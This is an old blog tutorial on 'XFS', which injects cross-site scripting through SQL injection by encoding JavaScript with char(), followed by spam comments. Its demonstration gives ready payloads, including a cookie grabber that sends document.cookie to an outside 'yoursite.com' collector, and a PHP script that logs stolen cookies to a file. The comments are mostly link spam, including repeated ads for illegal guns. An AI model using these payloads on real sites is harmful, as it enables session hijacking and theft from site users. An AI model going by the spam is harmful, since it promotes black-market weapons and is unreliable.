Sunday 19 February 2012

XFS - XSS From SQL


XFS - XSS From SQL


[------------------------------------------------------------------------]

[+] Summary

[1] Presentation
[2] Explanation
[3] Demonstration



[------------------------------------------------------------------------]


[1] --[Presentation]--

XFS is a SQL deviation who lets return javascript code by through of the 
function char().
This function convert an ASCII code to char, this why we'll 
use it to execute javascript code.
The XFS can give you a restricted XSS 
possibility and obviously the SQL vulnerabilty.


So for XFS we need :

- String to ASCII converter
- The function char()

In the next parties you will see the conditions for do it, how it work 
and demonstration.


[2] --[Explanation]--

To use it, you need to convert your string in ASCII 
Char() will read the ASCII code and return it, so if you insert 
the ASCII javascript code, char() will return you the 
javascript code and it will be executed BUT when you encode your javascript 
code, this codemustn't have any space, so the XSS is restricted
but you can grab, alert and a lot of other XSS thing.

Example :

If you want convert your javascript code to ASCII, for work, the javascript 
code mustn't to be like it :

<script > alert(document.cookie) </script> <= You need to delete space :

<script>alert(document.cookie)</script> <= Its okay, you can convert it in ASCII


When the code will be convert in ASCII, you will get a thing like it :

46 65 42 12 85 68 ...

But before put it in char(ASCII), we need to replace space by "," like it :

46,65,42,12,85,68 ... <= Its okay for put in char()


[3] --[Demonstration]--

Vuln website :


Some javascript codes without space :

Alert :

################################
#
#- String : <SCRIPT>alert('xss')</script>
#
#- ASCII : 60 83 67 82 73 80 84 62 97 108 101 114 116 40 39 120 115 115 39 #41 60 
47 115 99 114 105 112 116 62 
#
################################

Cookie Grabber :

################################
#
#- String : 
<SCRIPT>location.href='http://www.yoursite.com/cookie.php?#cookie='
+escape(document.cookie)</SCRIPT>
#
#- ASCII : 60 83 67 82 73 80 84 62 108 111 99 97 116 105 111 
110 46 104 114 101 102 61 39 104 116 116 112 58 47 47 119 
119 119 46 121 111 117 114 115 105 116 101 46 99 111 109 
47 99 111 111 107 105 101 46 112 104 112 63 99 111 111 107
 105 101 61 39 43 101 115 99 97 112 101 40 100 111 99 117 
109 101 110 116 46 99 111 111 107 105 101 41 60 47 83 67 
82 73 80 84 62 
#
################################

Cookie Grabber file :

################################
#

# <?php
#
#
$cookies = $_GET["cookie"];
#
# if($cookies)

# {

#
# $grab = fopen("grab.txt","a");

# fputs($grab, $cookies . "\r\n");

# fclose($grab);

#
# }

#
# ?>
#
################################


So before insert your ASCII in char(), you must replace 
(in the ASCII code) all space by ",".

Example :

################################
# 45 52 86 23 54 ...
# To :
# 45,52,86,23,54 ...
################################

So lets go :

Alert :


You can see a textbox is executed with the text : "XSS" => it's the XSS alert

21 comments:

Anonymous said...

[b][url=http://www.beatsbydreking.com]cheap beats by dre[/url][/b] stuffed animal is the one other impressive small remade skill due to Leo Sewell. a measure, ford mustang symbol, Earring in addition as a police arrest gun make-up several of the best units and that is essentially listed on to them remember to keep. most all referring to Sewell,S works gain the unique propensity to help you prefer to find them plus massiv the entire group, dependent upon their originality and it depth.


[b][url=http://www.beatsbydrepad.com/]beats by dre[/url][/b] Buckingham Fountain in scholarhip woodland is just about the sides typical features. chicago even offers the sole stream on earth in flows backwards. planners inverted their chicago, il riv in 1900 for hygienic the reason. train stop your skin right from smashing playing, refrain from eating levels of caffeine. most people are very sensitive to pure caffeine and delivers their specific face skin to escape. Even should you not coffee coffee bean, then chances are you drink place and even electrical power beers.


One can find a very good expenditure concerning headsets just about anywhere cyberspace. there are plenty of websites that could give you the best customer reviews an item you eagerly, So you might have the recommendations appearance several websites and purchase the items you really want. these kinds world-wide-web page be certain to go into exceedingly high item and / or are apt to have favourites the majority of earbuds.

http://www.beatsbydreking.com

Anonymous said...

Great article! This is the kind of info that are meant to be shared around
the internet. Shame on Google for now not positioning this submit upper!

Come on over and talk over with my website . Thank you =)

Also visit my web page; friedrich nietzsche quotes

Anonymous said...

Fastidious answers in return of this difficulty with real arguments and telling everything
concerning that.

Here is my webpage: william shakespeare quotes

Anonymous said...

When I originally commented I clicked the "Notify me when new comments are added" checkbox and now each
time a comment is added I get several e-mails with the same comment.
Is there any way you can remove me from that service?
Thanks!

Also visit my weblog; stephen hawking quotes

Anonymous said...

Somebody necessarily help to make critically posts
I would state. That is the first time I frequented your website page and so far?
I amazed with the analysis you made to make this particular
post extraordinary. Great activity!

Feel free to visit my blog post :: mistake quotes

Anonymous said...

Hey There. I found your blog using msn. This is an extremely well written article.
I'll be sure to bookmark it and come back to read more of your useful information. Thanks for the post. I will certainly return.

My web site - girlfriend quotes

Anonymous said...

Hi mates, nice post and pleasant urging commented at this place, I am actually enjoying
by these.

Here is my web page: commitment quotes

Anonymous said...

What's up friends, how is the whole thing, and what you wish for to say about this piece of writing, in my view its really amazing in favor of me.

My web blog unusual animals

Anonymous said...

Hey there! I know this is somewhat off topic but I was wondering which blog platform are
you using for this website? I'm getting sick and tired of Wordpress because I've had problems with hackers
and I'm looking at alternatives for another platform. I would be fantastic if you could point me in the direction of a good platform.

Here is my site - hatred quotes

Anonymous said...

Very great post. I simply stumbled upon your weblog and wished to say that I've truly enjoyed browsing your blog posts. After all I'll be
subscribing on your rss feed and I hope you write once more soon!


my blog post - nora ephron quotes

Anonymous said...

Link exchange is nothing else but it is only placing the other person's blog link on your page at suitable place and other person will also do same for you.

Here is my website: douglas adams quotes

Anonymous said...

If some one needs expert view about blogging and site-building after that i advise him/her to pay
a visit this web site, Keep up the fastidious job.


My page :: leonardo da vinci quotes

Anonymous said...

[url=http://www.bagsml.com/]chanel bag[/url] One of these changing seasons essential products might be skater vibrant, Which happens to be ideal all bloodstream types. when you experience a pear or just hourglass frame this brand of clothe will help to accentuate all of your micro waist, particularly if you put a low fat weight loss garment and into the mix to draw the attention to the next breed of your system much much more. folks a small as well as boyish period will find they will add the optical illusion associated shape, truth iphone carved the ladies can bust them out to draw attention away from their rounder abdomen,


[url=http://www.mikbags.com/]chanel handbags[/url] "i need your little brand to be bold! Nothing's even worse for you to at present the third or fourth buck or margaret in the category, and after that aside from that, can be just like having a unique brand name -- se'll have one benefit when they seek a job and the ones analyze hir mention about a job application, also, you will find bigger. being the RL bearer of a once-Nonstandard recognize, it's been version of undesirable a kid with a name no one else possessed (as well as,while cre8tive respellings end up being used just as bad). children and kids, need all the others, mentally identify individuals to be Like states or not wish, and consequently having a reasonably-routine first name is thing about this.


melbourne may possibly second-highest community in australia, And the main city of the condition of Victoria. It is situated on the surface of the famed port Phillip gulf, this succeeds like a mouth on the perfectly known together with challenging Yarra water. melbourne prides itself in stimulating each blend of Victorian-technology engineering and as well,furthermore present day put efforts, huge landscaped organic gardens next to individual locates of the basis capital city, art galleries having the most well-known singers, smooth streets-Scapes, cool in addition,yet tranquil outskirts.

[url=http://www.moubags.com/]www.moubags.com[/url]


Related articles:


[url=http://www.fsbuc.net/bbs/home.php?mod=space&uid=275666&do=blog&id=2565605]fashion design software nwf340ycu
[/url]
[url=http://bf210.com/read.php?tid=822823&ds=1]fashion blouses quc852grl
[/url]
[url=http://96.44.160.82/home.php?mod=space&uid=218043&do=blog&id=709981]40 s fashion sso645dlo
[/url]
[url=http://www.cikeluntan.com/thread-26596-1-1.html]hipster fashion cmr134pkn
[/url]
[url=http://xiaohaha818.com/forum.php?mod=viewthread&tid=221430]children fashion bvs213bgi
[/url]

Anonymous said...

best electronic cigarettes, smokeless cigarettes, e cigarettes, electronic cigarette, best electronic cigarette, e cigarette

nazmulhasan0178 said...

Do you need a virtual assistant to complete your personal or administrative type of work? Here I am for providing various kinds of services like cleaning your email list and extracting email from file and also selling USA targeted company details and selling some paid software. You can check out my services at http://ow.ly/Y00I30qizKc

Barone Chemeicals said...

Buy Colt AR15 A4 5.56 Rifles
 buy ar 15 rifle 
buy rifles online
illegal guns for sale
buy illagal guns UK
black market guns suppliers
black market guns


Buy Colt LE 6920MPS Slim Rifle 
 Buy Colt LE 6920MPS Slim
buy rifles online
buy illegal guns in Europe
buy illagal guns UK.


Buy Colt M4 Carbine 5.56 rifles
m4 rifles for sale
buy rifles online
illegal guns for sale
buy illagal guns UK.


Buy Glock 17 Online
17 handguns for sale
buy glock pistols
illegal guns for sale
buy illagal guns Austria.


Buy Glock 19 Online
gen 4 handguns for sale
buy glock pistols
guns for sale online
buy guns in Austria.



Buy Glock 20 Online
10 mm pistols for sale
buy glock pistols
guns for sale online
buy illagal guns Austria.


Buy Glock 21 Online
21 handguns for sale
buy guns online
buy guns in Austria
buy illagal guns UK


Buy Glock 26 Online
26 handguns for sale
buy glock pistols
illegal guns for sale in Europe
buy illagal guns UK.



Buy Glock 29 Online
29 handguns for sale
buy glock pistols
illegal guns for sale
buy illagal guns UK.


Buy Glock 30 Online
30 handguns for sale
buy glock pistols
illegal guns for sale
buy illagal guns UK

C7YPT0N said...

Hi admin, actually i'm learning so many things from your post. thanks for that.

click here to visit my blog. SecDevil.com

Barone Chemeicals said...

Buy Colt AR15 A4 5.56 Rifles
 buy ar 15 rifle 
buy rifles online
illegal guns for sale
buy illagal guns UK
black market guns suppliers
black market guns


Buy Colt LE 6920MPS Slim Rifle 
 Buy Colt LE 6920MPS Slim
buy rifles online
buy illegal guns in Europe
buy illagal guns UK.


Buy Colt M4 Carbine 5.56 rifles
m4 rifles for sale
buy rifles online
illegal guns for sale
buy illagal guns UK.


Buy Glock 17 Online
17 handguns for sale
buy glock pistols
illegal guns for sale
buy illagal guns Austria.


Buy Glock 19 Online
gen 4 handguns for sale
buy glock pistols
guns for sale online
buy guns in Austria.



Buy Glock 20 Online
10 mm pistols for sale
buy glock pistols
guns for sale online
buy illagal guns Austria.


Buy Glock 21 Online
21 handguns for sale
buy guns online
buy guns in Austria
buy illagal guns UK


Buy Glock 26 Online
26 handguns for sale
buy glock pistols
illegal guns for sale in Europe
buy illagal guns UK.



Buy Glock 29 Online
29 handguns for sale
buy glock pistols
illegal guns for sale
buy illagal guns UK.

michael smith said...

recycled flowers
Responsibly sourced. Sustainably made. Soulful with a story to tell. We work with artisan partners, small batch makers and ethical suppliers to create nature - inspired home decor.

admin said...


this is a very good site thanks for sharing this with us negative angle identities

Notepad++ said...

I have express a few of the articles on your website now, and I really like your style of blogging. download notepad++ 64 bit windows 7

Related Posts Plugin for WordPress, Blogger...